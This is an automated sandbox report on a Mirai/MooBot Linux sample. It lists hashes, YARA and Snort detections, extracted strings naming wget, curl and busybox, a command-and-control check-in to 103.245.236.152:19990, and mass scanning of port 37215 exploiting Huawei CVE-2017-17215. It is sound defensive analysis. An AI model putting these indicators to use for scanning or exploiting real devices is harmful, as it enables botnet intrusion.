Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljne.x86_64.elf

Overview

General Information

Sample name:skyljne.x86_64.elf
Analysis ID:1374441
MD5:059c0115b367791e046b05ee0249d52c
SHA1:0ffe6e224fce973cd4bf4854003cd0badb8cdf50
SHA256:9cbf86ec6517051c9ec7451d9ae7f149c00ef4bc4009ac8dc7735e64fb41d2a9
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1374441
Start date and time:2024-01-14 15:45:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 21s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljne.x86_64.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljne.x86_64.elf
PID:6228
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6235, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6235, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 6241, Parent: 1320)
  • Default (PID: 6241, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6258, Parent: 1320)
  • Default (PID: 6258, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljne.x86_64.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljne.x86_64.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljne.x86_64.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x19368:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1937c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x193f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1941c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1946c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x194f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      skyljne.x86_64.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xfea0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      skyljne.x86_64.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x1066f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 12 entries
      SourceRuleDescriptionAuthorStrings
      6228.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        6228.1.0000000000400000.000000000041d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6228.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x19368:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1937c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19390:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x193f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1941c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1946c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x194f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6228.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0xfea0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6228.1.0000000000400000.000000000041d000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x1066f:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          Click to see the 14 entries
          Timestamp:192.168.2.2394.121.128.2153166372152829579 01/14/24-15:47:00.081324
          SID:2829579
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23191.61.215.5636574372152835222 01/14/24-15:46:59.862551
          SID:2835222
          Source Port:36574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:103.245.236.152192.168.2.2319990328222030489 01/14/24-15:46:47.471532
          SID:2030489
          Source Port:19990
          Destination Port:32822
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23212.76.98.18845048372152835222 01/14/24-15:46:25.124906
          SID:2835222
          Source Port:45048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15232822199902030490 01/14/24-15:45:51.149738
          SID:2030490
          Source Port:32822
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23103.245.236.15234286199902030490 01/14/24-15:46:58.677910
          SID:2030490
          Source Port:34286
          Destination Port:19990
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23212.76.98.18845048372152829579 01/14/24-15:46:25.124906
          SID:2829579
          Source Port:45048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2334.102.138.10260746372152835222 01/14/24-15:46:09.804103
          SID:2835222
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23191.61.215.5636574372152829579 01/14/24-15:46:59.862551
          SID:2829579
          Source Port:36574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2334.102.138.10260746372152829579 01/14/24-15:46:09.804103
          SID:2829579
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2394.121.128.2153166372152835222 01/14/24-15:47:00.081324
          SID:2835222
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:103.245.236.152192.168.2.2319990342862030489 01/14/24-15:46:59.049899
          SID:2030489
          Source Port:19990
          Destination Port:34286
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: skyljne.x86_64.elfAvira: detected
          Source: skyljne.x86_64.elfReversingLabs: Detection: 60%
          Source: skyljne.x86_64.elfJoe Sandbox ML: detected
          Source: skyljne.x86_64.elfString: Content-Length: wgetcurl/bin/busyboxechocatnano/proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverPOST /goform/set_LimitClient_cfg HTTP/1.1

          Networking

          barindex
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:32822 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.152:19990 -> 192.168.2.23:32822
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60746 -> 34.102.138.102:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60746 -> 34.102.138.102:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45048 -> 212.76.98.188:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45048 -> 212.76.98.188:37215
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:34286 -> 103.245.236.152:19990
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.152:19990 -> 192.168.2.23:34286
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36574 -> 191.61.215.56:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36574 -> 191.61.215.56:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53166 -> 94.121.128.21:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53166 -> 94.121.128.21:37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60746 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36574 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 4.65.119.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 165.136.137.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.117.71.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.201.126.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.132.74.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.10.19.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.43.69.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 1.50.23.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.35.197.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.102.198.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 93.206.72.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 170.38.36.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.108.43.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.160.199.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.176.230.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.159.194.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.172.74.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.98.250.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.165.236.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 89.33.175.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 186.229.169.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 90.164.137.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 106.173.238.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.119.197.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.1.158.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.173.13.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.43.54.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.178.37.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.68.85.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.164.208.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.33.46.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.63.19.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 150.250.123.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.225.197.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.59.8.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.33.53.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.178.47.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.75.110.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.194.196.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.109.188.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.195.219.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 52.184.19.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 138.254.74.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.247.191.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.36.27.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 17.65.59.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 111.245.119.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.232.139.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.171.97.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.190.59.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.228.195.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.227.51.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.1.27.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.114.193.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.212.124.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 138.91.236.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 184.85.22.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.10.128.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.114.41.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.54.28.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.237.1.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.36.93.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 72.45.7.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 43.168.206.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 62.31.163.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.49.10.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.178.252.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.192.227.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.58.183.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.81.166.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.252.200.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 116.161.99.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.54.224.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.154.158.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.182.234.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.167.170.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.34.241.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 90.19.38.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.14.184.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.143.120.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.251.21.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.11.21.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 136.45.97.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 126.189.33.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.245.58.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.147.241.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.63.241.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.31.41.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.73.40.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 167.203.89.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.11.169.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.145.136.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.172.148.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.171.254.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.211.190.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.9.213.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.195.103.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.118.97.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 213.140.71.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.109.56.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.251.3.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 116.102.44.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.227.212.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 123.24.115.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.121.23.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 113.155.209.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.91.68.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.13.245.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 190.229.71.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.62.28.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.174.91.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.132.133.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.0.84.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.162.225.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.38.151.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.155.197.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.140.26.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.130.28.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.30.45.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.72.125.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 144.134.96.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.81.216.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.216.89.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 70.126.226.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.104.23.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 185.22.236.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.168.41.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.76.65.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.41.204.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.57.228.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 91.253.19.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.89.55.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 162.25.181.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.192.178.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.177.146.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.194.85.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 44.213.16.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.174.194.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 180.199.145.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 9.109.12.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 199.222.68.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.121.15.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.139.26.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.131.187.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.165.253.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 17.43.145.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.194.56.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.213.202.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.66.254.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 34.29.41.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.162.56.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 121.154.92.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.69.218.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.31.156.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.164.92.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 68.202.135.220:37215
